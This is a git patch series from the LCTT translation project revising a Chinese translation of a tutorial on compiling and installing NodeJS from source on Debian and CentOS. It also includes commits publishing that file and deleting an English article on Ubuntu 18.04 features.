NodeJS 8.1.1 的源代码。你不要忘记去点那个建议的大的蓝色按钮来下载一个项目的 ZIP 压缩包。对于我来说,为讲解的目的,我从命令行中下载并解压这个 ZIP 压缩包。但是,如果你更喜欢使用一个 [GUI][15] 工具,不用担心,你可以取代下面的命令方式: ``` wget https://github.com/nodejs/node/archive/v8.1.1.zip @@ -54,7 +54,7 @@ unzip v8.1.1.zip cd node-8.1.1/ ``` -下载一个 ZIP 包它做的很好,但是如果你希望去做 “like a pro”,我建议你直接使用 `git` 工具去下载源代码。它一点也不复杂 — 并且如果你是第一次使用一个工具,它将是一个很好的开端,你以后将经常用到它: +下载一个 ZIP 包就可以,但是如果你希望“像个专家一样”,我建议你直接使用 `git` 工具去下载源代码。它一点也不复杂 — 并且如果你是第一次使用该工具,它将是一个很好的开端,你以后将经常用到它: ``` # first ensure git is installed on your system @@ -66,9 +66,9 @@ sh$ git clone --depth 1 \ sh$ cd node/ ``` -顺便说一下,如果你想发布任何项目,正好可以考虑把这篇文章的第一部分做为一个总体介绍。后面,为了帮你排除常问题,我们将更详细地解释基于 Debian 和基于 ReadHat 的发布。 +顺便说一下,如果你有任何问题,这篇文章的第一部分只是做一个总体介绍而已。后面,为了帮你排除常见问题,我们将基于 Debian 和基于 RedHat 的发行版更详细地解释。 -不管怎样,在你使用 `git` 或者作为一个 ZIP 压缩包下载了源代码后,你现在应该在当前的目录下提取源代码文件: +不管怎样,在你使用 `git` 或者作为一个 ZIP 压缩包下载了源代码后,在当前目录下就有了同样的源代码文件: ``` sh$ ls @@ -78,51 +78,51 @@ benchmark CODE_OF_CONDUCT.md CONTRIBUTING.md lib node.g BSDmakefile COLLABORATOR_GUIDE.md deps LICENSE README.md vcbuild.bat ``` -### 第 2 步:理解程序的构建系统 +#### 第 2 步:理解程序的构建系统 -构建系统就是我们通常所说的 "编译源代码”, 其实,编译只是从源代码中生成一个可使用的软件的其中一个阶段。一个构建系统是一套工具,在具体的实践中,为了完全构建一个软件,仅仅需要发出几个命令就可以自动并清晰地完成这些不同的任务。 +构建系统就是我们通常所说的“编译源代码”,其实,编译只是从源代码中生成一个可使用的软件的其中一个阶段。构建系统是一套工具,用于自动处置不同的任务,以便可以仅通过几个命令就能构建整个软件。 -虽然概念很简单,实际上编译做了很多事情。因为不同的项目或者编程语言可能要求不一样,或者是因为编程体验,或者因为支持的平台、或者因为历史的原因,或者 … 或者 … 选择或创建其它的构建系统的原因有很多。所有的这些都说明可用的不同的解决方案有很多。 +虽然概念很简单,实际上编译做了很多事情。因为不同的项目或者编程语言也许有不同的要求,或者因为编程者的好恶,或者因为支持的平台、或者因为历史的原因,等等等等 … 选择或创建另外一个构建系统的原因几乎数不清。这方面有许多种不同的解决方案。 -NodeJS 使用一个 [GNU 风格的构建系统][16]。在开源社区中这是一个很流行的选择。一旦开始,将进入一段精彩的旅程。 +NodeJS 使用一种 [GNU 风格的构建系统][16]。这在开源社区中这是一个很流行的选择。由此开始,你将进入一段精彩的旅程。 -写出和调优一个构建系统是一个非常复杂的任务。但是,作为 “终端用户” 来说, GNU 风格的构建系统使用两个工具来构建它们:`configure` 和 `make`。 +写出和调优一个构建系统是一个非常复杂的任务。但是,作为 “终端用户” 来说,GNU 风格的构建系统使用两个工具让他们免于此难:`configure` 和 `make`。 -`configure` 文件是项目专用的脚本,为了确保项目可以被构建,它将检查目标系统配置和可用功能,最后使用当前平台专用的脚本来处理构建工作。 +`configure` 文件是个项目专用的脚本,它将检查目标系统的配置和可用功能,以确保该项目可以被构建,并最终吻合当前平台的特性。 -一个典型的 `configure` 作业的重要部分是去构建 `Makefile`。这个文件包含有效构建项目所需的指令。 +一个典型的 `configure` 任务的重要部分是去构建 `Makefile`。这个文件包含了有效构建项目所需的指令。 -([`make` 工具][17]),另一方面,一个 POSIX 工具可用于任何类 Unix 系统。它将读取项目专用的 `Makefile` 然后执行所需的操作去构建和安装你的程序。 +另一方面,[`make` 工具][17],这是一个可用于任何类 Unix 系统的 POSIX 工具。它将读取项目专用的 `Makefile` 然后执行所需的操作去构建和安装你的程序。 -但是,在 Linux 的世界中,你仍然有一些原因去定制你自己专用的构建。 +但是,在 Linux 的世界中,你仍然有一些定制你自己专用的构建的理由。 ``` ./configure --help ``` -`configure -help` 命令将展示所有你可用的配置选项。再强调一下,它是项目专用的。说实话,有时候,在你完全理解每个配置选项的作用之前,你需要深入到项目中去好好研究。 +`configure -help` 命令将展示你可用的所有配置选项。再强调一下,这是非常的项目专用。说实话,有时候,在你完全理解每个配置选项的作用之前,你需要深入到项目中去好好研究。 -但是,这里至少有一个标准的 GNU 自动化工具选项,它就是众所周知的 `--prefix` 选项。它与文件系统的层次结构有关,它是你软件要安装的位置。 +不过,这里至少有一个标准的 GNU 自动化工具选项是你该知道的,它就是众所周知的 `--prefix` 选项。它与文件系统的层次结构有关,它是你软件要安装的位置。 -[Suggested read8 Vim Tips And Tricks That Will Make You A Pro User][18] +#### 第 3 步:文件系统层次化标准(FHS) -### 第 3 步:文件系统层次化标准(FHS) - -大部分典型的 Linux 分发版的文件系统层次结构都遵从 [文件系统层次化标准(FHS)][19]。 +大部分典型的 Linux 发行版的文件系统层次结构都遵从 [文件系统层次化标准(FHS)][19]。 这个标准说明了你的系统中各种目录的用途,比如,`/usr`、`/tmp`、`/var` 等等。 -当使用 GNU 自动化工具 _和大多数其它的构建系统_ 时,它的默认安装位置都在你的系统的 `/usr/local` 目录中。依据 FHS 中 _“/usr/local 层级是为系统管理员安装软件的位置使用的,它在系统软件更新时是覆盖安全的。它可以被用于一个主机组中,在 /usr 中找不到的、可共享的程序和数据”_ ,因此,它是一个非常好的选择。 +当使用 GNU 自动化工具 _和大多数其它的构建系统_ 时,它会把新软件默认安装在你的系统的 `/usr/local` 目录中。这是依据 FHS 中 _“`/usr/local` 层级是为系统管理员本地安装软件时使用的,它在系统软件更新覆盖时是安全的。它也可以用于存放在一组主机中共享,但又没有放到 /usr 中的程序和数据”_,因此,它是一个非常好的选择。 -`/usr/local` 层次以某种方式复制了 root 目录,并且你可以在 `/usr/local/bin` 这里找到可执行程序,在 `/usr/local/lib` 中是库,在 `/usr/local/share` 中是架构依赖文件,等等。 +`/usr/local` 层级以某种方式复制了根目录,你可以在 `/usr/local/bin` 这里找到可执行程序,在 `/usr/local/lib` 中找到库,在 `/usr/local/share` 中找到架构无关的文件,等等。 -使用 `/usr/local` 树作为你定制安装的软件位置的唯一问题是,你的软件将在这里混杂在一起。尤其是你安装了多个软件之后,将很难去准确地跟踪 `/usr/local/bin` 和 `/usr/local/lib` 到底属于哪个软件。它虽然不足以在你的系统上产生问题。毕竟,`/usr/bin` 是很混乱的。但是,它在你想去手工卸载已安装的软件时会将成为一个问题。 +使用 `/usr/local` 树作为你定制安装的软件位置的唯一问题是,你的软件的文件将在这里混杂在一起。尤其是你安装了多个软件之后,将很难去准确地跟踪 `/usr/local/bin` 和 `/usr/local/lib` 中的哪个文件到底属于哪个软件。它虽然不会导致系统的问题。毕竟,`/usr/bin` 也是一样混乱的。但是,有一天你想去卸载一个手工安装的软件时它会将成为一个问题。 -去解决这个问题,我通常喜欢安装定制的软件到 `/opt` 子目录下。再次引用 FHS: +要解决这个问题,我通常喜欢安装定制的软件到 `/opt` 子目录下。再次引用 FHS: - _“`/opt` 是为安装应用程序插件软件包而保留的。一个包安装在 `/opt` 下必须在 `/opt/` 或者 `/opt/` 目录中独立定位到它的静态文件,`` 处是所说的那个软件名的名字,而 `` 处是提供者的 LANANA 注册名字。”_(译者注:LANANA 是指 The Linux Assigned Names And Numbers Authority,http://www.lanana.org/ ) +> “`/opt` 是为安装附加的应用程序软件包而保留的。 + +> 包安装在 `/opt` 下的软件包必须将它的静态文件放在单独的 `/opt/` 或者 `/opt/` 目录中,此处 `` 是所说的那个软件名的名字,而 `` 处是提供者的 LANANA 注册名字。”(LCTT 译注:LANANA 是指 [The Linux Assigned Names And Numbers Authority](http://www.lanana.org/)。 ) -因此,我们将在 `/opt` 下创建一个子目录,用于我们定制的 NodeJS 的安装。并且,如果有一天我想去卸载它,我只是很简单地去删除那个目录: +因此,我们将在 `/opt` 下创建一个子目录,用于我们定制的 NodeJS 安装。并且,如果有一天我想去卸载它,我只是很简单地去删除那个目录: ``` sh$ sudo mkdir /opt/node-v8.1.1 @@ -140,7 +140,7 @@ sh$ make -j9 && echo ok # is blocked by an I/O operation. ``` -在你运行完成 `make` 命令之后,如果有任何的除了 “ok” 以外的信息,将意味着在构建过程中有错误。比如,我们使用一个 `-j` 选项去运行一个并行构建,在构建系统的大量输出过程中,检索错误信息并不是件很容易的事。 +在你运行完成 `make` 命令之后,如果有任何的除了 “ok” 以外的信息,将意味着在构建过程中有错误。当我们使用一个 `-j` 选项去运行并行构建时,在构建系统的大量输出过程中,检索错误信息并不是件很容易的事。 在这种情况下,只能是重新开始 `make`,并且不要使用 `-j` 选项。这样错误将会出现在输出信息的最后面: @@ -163,9 +163,9 @@ v8.1.1 ### B. 如果在源代码安装的过程中出现错误怎么办? -我上面介绍的是大多数的文档丰富的项目在“构建指令”页面上你所看到的。但是,本文的目标是让你从源代码开始去编译你的第一个软件,它可能要花一些时间去研究一些常见的问题。因此,我将再次重新开始一遍整个过程,但是,这次是在一个最新的、最小化安装的 Debian 9.0 和 CentOS 7.0 系统上。因此,你可能看到很多的错误和我怎么去解决它。 +我上面介绍的大多是你能在文档完备的项目的“构建指令”页面上看到。但是,本文的目标是让你从源代码开始去编译你的第一个软件,它可能要花一些时间去研究一些常见的问题。因此,我将再次重新开始一遍整个过程,但是,这次是在一个最新的、最小化安装的 Debian 9.0 和 CentOS 7.0 系统上。因此,你可能看到我遇到的错误以及我怎么去解决它。 -### 从 Debian 9.0 中 “Stretch” 开始 +#### 从 Debian 9.0 中 “Stretch” 开始 ``` itsfoss@debian:~$ git clone --depth 1 \ @@ -174,7 +174,7 @@ itsfoss@debian:~$ git clone --depth 1 \ -bash: git: command not found ``` -这个问题非常容易去诊断和解决。仅仅是去安装这个 `git` 包: +这个问题非常容易去诊断和解决。去安装这个 `git` 包即可: ``` itsfoss@debian:~$ sudo apt-get install git @@ -205,7 +205,7 @@ Node.js configure error: No acceptable C compiler found! it in a non-standard prefix. ``` -很显然,编译一个项目,你需要一个编译器。NodeJS 是使用 [C++ language][20] 写的,我们需要一个 C++ [编译器][21]。在这里我将安装 `g++`,它就是为这个目的写的 GNU C++ 编译器: +很显然,编译一个项目,你需要一个编译器。NodeJS 是使用 [C++ 语言][20] 写的,我们需要一个 C++ [编译器][21]。在这里我将安装 `g++`,它就是为这个目的写的 GNU C++ 编译器: ``` itsfoss@debian:~/node$ sudo apt-get install g++ @@ -237,9 +237,9 @@ v8.1.1 成功! -请注意:我将安装各种工具一步一步去展示怎么去诊断编译问题,以及展示怎么去解决这些问题。但是,如果你搜索关于这个主题的更多文档,或者读其它的教程,你将发现,很多分发版有一个 “meta-packages”,它像一个伞一样去安装一系列的或者全部的常用工具用于编译软件。在基于 Debian 的系统上,你或许遇到过 [构建要素][22] 包,它就是这种用作。在基于 Red Hat 的分发版中,它将是  _“开发工具”_ 组。 +请注意:我将一次又一次地安装各种工具去展示怎么去诊断编译问题,以及展示怎么去解决这些问题。但是,如果你搜索关于这个主题的更多文档,或者读其它的教程,你将发现,很多发行版有一个 “meta-packages”,它包罗了安装一些或者全部的用于编译软件的常用工具。在基于 Debian 的系统上,你或许遇到过 [build-essentials][22] 包,它就是这种用作。在基于 Red Hat 的发行版中,它将是  _“Development Tools”_ 组。 -### 在 CentOS 7.0 上 +#### 在 CentOS 7.0 上 ``` [itsfoss@centos ~]$ git clone --depth 1 \ @@ -279,7 +279,7 @@ Node.js configure error: No acceptable C compiler found! it in a non-standard prefix. ``` -你知道的:NodeJS 是使用 C++ 语言写的,但是,我的系统缺少合适的编译器。Yum 可以帮到你。因为,我不是一个合格的 CentOS 用户,在因特网上准确地找到包含 g++ 编译器的包的名字是很困难的。这个页面会指导我:[https://superuser.com/questions/590808/yum-install-gcc-g-doesnt-work-anymore-in-centos-6-4][23] +你知道的:NodeJS 是使用 C++ 语言写的,但是,我的系统缺少合适的编译器。Yum 可以帮到你。因为,我不是一个合格的 CentOS 用户,我实际上是在互联网上搜索到包含 g++ 编译器的包的确切名字的。这个页面指导了我:[https://superuser.com/questions/590808/yum-install-gcc-g-doesnt-work-anymore-in-centos-6-4][23] 。 ``` [itsfoss@centos node]$ sudo yum install gcc-c++ @@ -309,9 +309,9 @@ v8.1.1 ### C. 从源代码中对要安装的软件做一些改变 -你从源代码中安装一个软件,可能是因为你的分发仓库中没有一个可用的特定版本。或者因为你想去 _修改_ 那个程序。也可能是修复一个 bug 或者增加一个特性。毕竟,开源软件这些都可以做到。因此,我将抓住这个机会,让你亲自体验怎么去编译你自己的软件。 +从源代码中安装一个软件,可能是因为你的分发仓库中没有一个可用的特定版本。或者因为你想去 _修改_ 那个程序。也可能是修复一个 bug 或者增加一个特性。毕竟,开源软件这些都可以做到。因此,我将抓住这个机会,让你亲自体验怎么去编译你自己的软件。 -在这里,我将在 NodeJS 源代码上生成一个主要的改变。然后,我们将看到我们的改变将被纳入到软件的编译版本中: +在这里,我将在 NodeJS 源代码上做一个微小改变。然后,我们将看到我们的改变将被纳入到软件的编译版本中: 用你喜欢的 [文本编辑器][24](如,vim、nano、gedit、 … )打开文件 `node/src/node.cc`。然后,尝试找到如下的代码片段: @@ -351,7 +351,7 @@ index bbce1022..a5618b57 100644 PrintHelp(); ``` -在你改变的行之前,你将看到一个 “-” (减号标志)。而在改变之后的行前面有一个 “+” (加号标志)。 +在你前面改变的那行之前,你将看到一个 “-” (减号标志)。而在改变之后的行前面有一个 “+” (加号标志)。 现在可以去重新编译并重新安装你的软件了: @@ -363,37 +363,37 @@ ok 这个时候,可能失败的唯一原因就是你改变代码时的输入错误。如果就是这种情况,在文本编辑器中重新打开 `node/src/node.cc` 文件并修复错误。 -一旦你管理的一个编译和安装的新修改版本的 NodeJS,将可以去检查你的修改是否包含到软件中: +一旦你完成了新修改版本的 NodeJS 的编译和安装,就可以去检查你的修改是否包含到软件中: ``` itsfoss@debian:~/node$ /opt/node/bin/node --version v8.1.1 (compiled by myself) ``` -恭喜你!你生成了开源程序中你的第一个改变! +恭喜你!你对开源程序做出了你的第一个改变! -### D. 让 shell 定位到定制构建的软件 +### D. 让 shell 找到我们定制构建的软件 -到目前为止,你可能注意到,我通常启动我新编译的 NodeJS 软件是通过指定一个到二进制文件的绝对路径。 +到目前为止,你可能注意到,我通常启动我新编译的 NodeJS 软件是通过指定到该二进制文件的绝对路径。 ``` /opt/node/bin/node ``` -这是可以正常工作的。但是,这样太麻烦。实际上有两种办法可以去解决这个问题。但是,去理解它们,你必须首先明白,你的 shell 定位可执行文件是进入到通过在[环境变量][26]`PATH` 中指定的目录去查找的。 +这是可以正常工作的。但是,这样太麻烦。实际上有两种办法可以去解决这个问题。但是,去理解它们,你必须首先明白,你的 shell 定位可执行文件是通过在[环境变量][26] `PATH` 中指定的目录里面查找的。 ``` itsfoss@debian:~/node$ echo $PATH /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games ``` -在 Debian 系统上,如果你不指定一个精确的目录做为命令名字的一部分,shell 将首先在 `/usr/local/bin` 中查找可执行程序,如果没有找到,然后进入 `/usr/bin` 中查找,如果没有找到,然后进入 `/bin`查找,如果没有找到,然后进入 `/usr/local/games` 查找,如果没有找到,然后进入 `/usr/games` 查找,如果没有找到,那么,shell 将报告一个错误,_“command not found”_。 +在这个 Debian 系统上,如果你不指定一个精确的目录做为命令名字的一部分,shell 将首先在 `/usr/local/bin` 中查找可执行程序;如果没有找到,然后进入 `/usr/bin` 中查找;如果没有找到,然后进入 `/bin`查找;如果没有找到,然后进入 `/usr/local/games` 查找;如果没有找到,然后进入 `/usr/games` 查找;如果没有找到,那么,shell 将报告一个错误,_“command not found”_。 -由此,我们可以知道有两种方法去确保命令可以被 shell 访问到:通过将它增加到已经配置好的 `PATH` 目录中,或者将包含可执行程序的目录添加到 `PATH` 中。 +由此,我们可以知道有两种方法去确保命令可以被 shell 访问到:将它(该二进制程序)增加到已经配置好的 `PATH` 目录中,或者将包含可执行程序的目录添加到 `PATH` 中。 -### 从 /usr/local/bin 中添加一个链接 +#### 从 /usr/local/bin 中添加一个链接 -仅从 `/opt/node/bin` 中 _拷贝_ 节点二进制可执行文件到 `/usr/local/bin` 是将是一个错误的做法。因为,如果这么做,可执行程序将无法定位到在 `/opt/node/` 中的其它需要的组件。(常见的做法是软件在它自己的位置去定位它所需要的资源文件) +只是从 `/opt/node/bin` 中 _拷贝_ NodeJS 二进制可执行文件到 `/usr/local/bin` 是一个错误的做法。因为,如果这么做,该可执行程序将无法定位到在 `/opt/node/` 中的需要的其它组件。(软件以它自己的位置去定位它所需要的资源文件是常见的做法) 因此,传统的做法是去使用一个符号链接: @@ -405,11 +405,11 @@ itsfoss@debian:~/node$ node --version v8.1.1 (compiled by myself) ``` -这一个简单而有效的解决办法,尤其是,如果一个软件包是由好几个众所周知的可执行程序组成的,因为,你将为每个用户调用命令创建一个符号链接。例如,如果你熟悉 NodeJS,你知道应用的 `npm` 组件,也是 `/usr/local/bin` 中的符号链接。这只是,我让你做了一个练习。 +这一个简单而有效的解决办法,尤其是,如果一个软件包是由好几个众所周知的可执行程序组成的,因为,你将为每个用户调用的命令创建一个符号链接。例如,如果你熟悉 NodeJS,你知道应用的 `npm` 组件,也应该从 `/usr/local/bin` 做个符号链接。我把这个留给你做练习。 -### 修改 PATH +#### 修改 PATH -首先,如果你尝试前面的解决方案,先移除前面创建的节点符号链接,去从一个干净的状态开始: +首先,如果你尝试过前面的解决方案,请先移除前面创建的节点符号链接,去从一个干净的状态开始: ``` itsfoss@debian:~/node$ sudo rm /usr/local/bin/node @@ -417,7 +417,7 @@ itsfoss@debian:~/node$ which -a node || echo not found not found ``` -现在,这里有一个不可思议的命令去改变你的 `PATH`: +现在,这里有一个改变你的 `PATH` 的魔法命令: ``` itsfoss@debian:~/node$ export PATH="/opt/node/bin:${PATH}" @@ -425,7 +425,7 @@ itsfoss@debian:~/node$ echo $PATH /opt/node/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games ``` -简单说就是,我用前面的内容替换了环境变量 `PATH` 中原先的内容,但是通过一个 `/opt/node/bin` 的前缀。因此,你可以想像一下,shell 将先进入到 `/opt/node/bin` 目录中查找可执行程序。我们也可以使用 `which` 命令去确认一下: +简单说就是,我用环境变量 `PATH` 之前的内容前缀了一个 `/opt/node/bin` 替换了其原先的内容。因此,你可以想像一下,shell 将先进入到 `/opt/node/bin` 目录中查找可执行程序。我们也可以使用 `which` 命令去确认一下: ``` itsfoss@debian:~/node$ which -a node || echo not found @@ -434,7 +434,7 @@ itsfoss@debian:~/node$ node --version v8.1.1 (compiled by myself) ``` -鉴于 “link” 解决方案是永久的,只要创建到 `/usr/local/bin`的符号链接就行了,而对 `PATH` 的改变仅对进入到当前的 shell 生效。你可以自己做一些研究,如何做到对 `PATH` 的永久改变。给你一个提示,可以将它写到你的 “profile” 中。如果你找到这个解决方案,不要犹豫,通过下面的评论区共享给其它的读者! +鉴于 “符号链接” 解决方案是永久的,只要创建到 `/usr/local/bin` 的符号链接就行了,而对 `PATH` 的改变仅影响到当前的 shell。你可以自己做一些研究,如何做到对 `PATH` 的永久改变。给你一个提示,可以将它写到你的 “profile” 中。如果你找到这个解决方案,不要犹豫,通过下面的评论区共享给其它的读者! ### E. 怎么去卸载刚才从源代码中安装的软件 @@ -444,7 +444,7 @@ v8.1.1 (compiled by myself) sudo rm -rf /opt/node-v8.1.1 ``` -注意:`sudo` 和 `rm -rf` 是 “非常危险的鸡尾酒!”,一定要在按下 “enter” 键之前多检查几次你的命令。你不会得到任何的确认信息,并且如果你删除了错误的目录它是不可恢复的 … +注意:`sudo` 和 `rm -rf` 是 “非常危险的鸡尾酒”!一定要在按下回车键之前多检查几次你的命令。你不会得到任何的确认信息,并且如果你删除了错误的目录它是不可恢复的 … 然后,如果你修改了你的 `PATH`,你可以去恢复这些改变。它一点也不复杂。 @@ -460,9 +460,9 @@ itsfoss@debian:~/node$ sudo find /usr/local/bin \ ### 等等? 依赖地狱在哪里? -一个最终结论是,如果你读过有关的编译定制软件的文档,你可能听到关于 [依赖地狱][27] 的说法。那是在你能够成功编译一个软件之前,对那种烦人情况的一个呢称,你必须首先编译一个前提条件所需要的库,它又可能要求其它的库,而这些库有可能与你的系统上已经安装的其它软件不兼容。 +作为最终的讨论,如果你读过有关的编译定制软件的文档,你可能听到关于 [依赖地狱][27]dependency hell 的说法。那是在你能够成功编译一个软件之前,对那种烦人情况的一个别名,你必须首先编译一个前提条件所需要的库,它又可能要求其它的库,而这些库有可能与你的系统上已经安装的其它软件不兼容。 -作为你的分发版的包维护者的工作的一部分,去真正地解决那些依赖关系,确保你的系统上的各种软件都使用了可兼容的库,并且按正确的顺序去安装。 +发行版的软件包维护者的部分工作,就是实际去地解决那些依赖地狱,确保你的系统上的各种软件都使用了兼容的库,并且按正确的顺序去安装。 在这篇文章中,我特意选择了 NodeJS 去安装,是因为它几乎没有依赖。我说 “几乎” 是因为,实际上,它  _有_  依赖。但是,这些源代码的依赖已经预置到项目的源仓库中(在 `node/deps` 子目录下),因此,在你动手编译之前,你不用手动去下载和安装它们。 @@ -478,9 +478,9 @@ itsfoss@debian:~/node$ sudo find /usr/local/bin \ via: https://itsfoss.com/install-software-from-source-code/ -作者:[Sylvain Leroux ][a] +作者:[Sylvain Leroux][a] 译者:[qhwdw](https://github.com/qhwdw) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 49dec102ccff1687ab57f86d5d4c855246c469f8 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 25 Dec 2017 21:51:49 +0800 Subject: [PATCH 0784/1627] PUB:20171006 How to Install Software from Source Code... and Remove it Afterwards.md @qhwdw https://linux.cn/article-9172-1.html --- ...stall Software from Source Code... and Remove it Afterwards.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171006 How to Install Software from Source Code... and Remove it Afterwards.md (100%) diff --git a/translated/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md b/published/20171006 How to Install Software from Source Code... and Remove it Afterwards.md similarity index 100% rename from translated/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md rename to published/20171006 How to Install Software from Source Code... and Remove it Afterwards.md From cf9f1cffd9d85134985bf64906890e22b2c863bd Mon Sep 17 00:00:00 2001 From: cmn <2545489745@qq.com> Date: Mon, 25 Dec 2017 23:23:47 +0800 Subject: [PATCH 0785/1627] translated --- .../20171205 Ubuntu 18.04 – New Features.md | 155 ----------------- .../20171205 Ubuntu 18.04 – New Features.md | 159 ++++++++++++++++++ 2 files changed, 159 insertions(+), 155 deletions(-) delete mode 100644 sources/tech/20171205 Ubuntu 18.04 – New Features.md create mode 100644 translated/tech/20171205 Ubuntu 18.04 – New Features.md diff --git a/sources/tech/20171205 Ubuntu 18.04 – New Features.md b/sources/tech/20171205 Ubuntu 18.04 – New Features.md deleted file mode 100644 index 70682f6304..0000000000 --- a/sources/tech/20171205 Ubuntu 18.04 – New Features.md +++ /dev/null @@ -1,155 +0,0 @@ -translating by kimii -Ubuntu 18.04 – New Features, Release Date & More -============================================================ - - -We’ve all been waiting for it – the new LTS release of Ubuntu – 18.04\. Learn more about new features, the release dates, and more. - -> Note: we’ll frequently update this article with new information, so bookmark this page and check back soon. - -### Basic information about Ubuntu 18.04 - -Let’s start with some basic information. - -* It’s a new LTS (Long Term Support) release. So you get 5 years of support for both the desktop and server version. - -* Named “Bionic Beaver”. The founder of Canonical, Mark Shuttleworth, explained the meaning behind the name. The mascot is a Beaver because it’s energetic, industrious, and an awesome engineer – which perfectly describes a typical Ubuntu user, and the new Ubuntu release itself. The “Bionic” adjective is due to the increased number of robots that run on the Ubuntu Core. - -### Ubuntu 18.04 Release Dates & Schedule - -If you’re new to Ubuntu, you may not be familiar the actual version numbers mean. It’s the year and month of the official release. So Ubuntu’s 18.04 official release will be in the 4th month of the year 2018. Ubuntu 17.10 was released in 2017, in the 10th month of the year. - -To go into further details, here are the important dates and need to know about Ubuntu 18.04 LTS: - -* November 30th, 2017 – Feature Definition Freeze. - -* January 4th, 2018 – First Alpha release. So if you opted-in to receive new Alpha releases, you’ll get the Alpha 1 update on this date. - -* February 1st, 2018 – Second Alpha release. - -* March 1st, 2018 – Feature Freeze. No new features will be introduced or released. So the development team will only work on improving existing features and fixing bugs. With exceptions, of course. If you’re not a developer or an experienced user, but would still like to try the new Ubuntu ASAP, then I’d personally recommend starting with this release. - -* March 8th, 2018 – First Beta release. If you opted-in for receiving Beta updates, you’ll get your update on this day. - -* March 22nd, 2018 – User Interface Freeze. It means that no further changes or updates will be done to the actual user interface, so if you write documentation, [tutorials][1], and use screenshots, it’s safe to start then. - -* March 29th, 2018 – Documentation String Freeze. There won’t be any edits or new stuff (strings) added to the documentation, so translators can start translating the documentation. - -* April 5th, 2018 – Final Beta release. This is also a good day to start using the new release. - -* April 19th, 2018 – Final Freeze. Everything’s pretty much done now. Images for the release are created and distributed, and will likely not have any changes. - -* April 26th, 2018 – Official, Final release of Ubuntu 18.04\. Everyone should start using it starting this day, even on production servers. We recommend getting an Ubuntu 18.04 server from [Vultr][2] and testing out the new features. Servers at [Vultr][3] start at $2.5 per month. - -### What’s New in Ubuntu 18.04 - -All the new features in Ubuntu 18.04 LTS: - -### Color emojis are now supported  - -With previous versions, Ubuntu only supported monochrome (black and white) emojis, which quite frankly, didn’t look so good. Ubuntu 18.04 will support colored emojis by using the [Noto Color Emoji font][7]. With 18.04, you can view and add color emojis with ease everywhere. They are supported natively – so you can use them without using 3-rd party apps or installing/configuring anything extra. You can always disable the color emojis by removing the font. - -### GNOME desktop environment - - [![ubuntu 17.10 gnome](https://thishosting.rocks/wp-content/uploads/2017/12/ubuntu-17-10-gnome.jpg.webp)][8] - -Ubuntu started using the GNOME desktop environment with Ubuntu 17.10 instead of the default Unity environment. Ubuntu 18.04 will continue using GNOME. This is a major change to Ubuntu. - -### Ubuntu 18.04 Desktop will have a new default theme - -Ubuntu 18.04 is saying Goodbye to the old ‘Ambience’ default theme with a new GTK theme. If you want to help with the new theme, check out some screenshots and more, go [here][9]. - -As of now, there is speculation that Suru will be the [new default icon theme][10] for Ubuntu 18.04\. Here’s a screenshot: - - [![suru icon theme ubuntu 18.04](https://thishosting.rocks/wp-content/uploads/2017/12/suru-icon-theme-ubuntu-18-04.jpg.webp)][11] - -> Worth noting: all new features in Ubuntu 16.10, 17.04, and 17.10 will roll through to Ubuntu 18.04\. So updates like Window buttons to the right, a better login screen, imrpoved Bluetooth support etc. will roll out to Ubuntu 18.04\. We won’t include a special section since it’s not really new to Ubuntu 18.04 itself. If you want to learn more about all the changes from 16.04 to 18.04, google it for each version in between. - -### Download Ubuntu 18.04 - -First off, if you’re already using Ubuntu, you can just upgrade to Ubuntu 18.04. - -If you need to download Ubuntu 18.04: - -Go to the [official Ubuntu download page][12] after the final release. - -For the daily builds (alpha, beta, and non-final releases), go [here][13]. - -### FAQs - -Now for some of the frequently asked questions (with answers) that should give you more information about all of this. - -### When is it safe to switch to Ubuntu 18.04? - -On the official final release date, of course. But if you can’t wait, start using the desktop version on March 1st, 2018, and start testing out the server version on April 5th, 2018\. But for you to truly be “safe”, you’ll need to wait for the final release, maybe even more so the 3-rd party services and apps you are using are tested and working well on the new release. - -### How do I upgrade my server to Ubuntu 18.04? - -It’s a fairly simple process but has huge potential risks. We may publish a tutorial sometime in the near future, but you’ll basically need to use ‘do-release-upgrade’. Again, upgrading your server has potential risks, and if you’re on a production server, I’d think twice before upgrading. Especially if you’re on 16.04 which has a few years of support left. - -### How can I help with Ubuntu 18.04? - -Even if you’re not an experienced developer and Ubuntu user, you can still help by: - -* Spreading the word. Let people know about Ubuntu 18.04\. A simple share on social media helps a bit too. - -* Using and testing the release. Start using the release and test it. Again, you don’t have to be a developer. You can still find and report bugs, or send feedback. - -* Translating. Join the translating teams and start translating documentation and/or applications. - -* Helping other people. Join some online Ubuntu communities and help others with issues they’re having with Ubuntu 18.04\. Sometimes people need help with simple stuff like “where can I download Ubuntu?” - -### What does Ubuntu 18.04 mean for other distros like Lubuntu? - -All distros that are based on Ubuntu will have similar new features and a similar release schedule. You’ll need to check your distro’s official website for more information. - -### Is Ubuntu 18.04 an LTS release? - -Yes, Ubuntu 18.04 is an LTS (Long Term Support) release, so you’ll get support for 5 years. - -### Can I switch from Windows/OS X to Ubuntu 18.04? - -Of course! You’ll most likely experience a performance boost too. Switching from a different OS to Ubuntu is fairly easy, there are quite a lot of tutorials for doing that. You can even set up a dual-boot where you’ll be using multiple OSes, so you can use both Windows and Ubuntu 18.04. - -### Can I try Ubuntu 18.04 without installing it? - -Sure. You can use something like [VirtualBox][14] to create a “virtual desktop” – you can install it on your local machine and use Ubuntu 18.04 without actually installing Ubuntu. - -Or you can try an Ubuntu 18.04 server at [Vultr][15] for $2.5 per month. It’s essentially free if you use some [free credits][16]. - -### Why can’t I find a 32-bit version of Ubuntu 18.04? - -Because there is no 32bit version. Ubuntu dropped 32bit versions with its 17.10 release. If you’re using old hardware, you’re better off using a different [lightweight Linux distro][17] instead of Ubuntu 18.04 anyway. - -### Any other question? - -Leave a comment below! Share your thoughts, we’re super excited and we’re gonna update this article as soon as new information comes in. Stay tuned and be patient! - --------------------------------------------------------------------------------- - -via: https://thishosting.rocks/ubuntu-18-04-new-features-release-date/ - -作者:[ thishosting.rocks][a] -译者:[译者ID](https://github.com/译者ID) 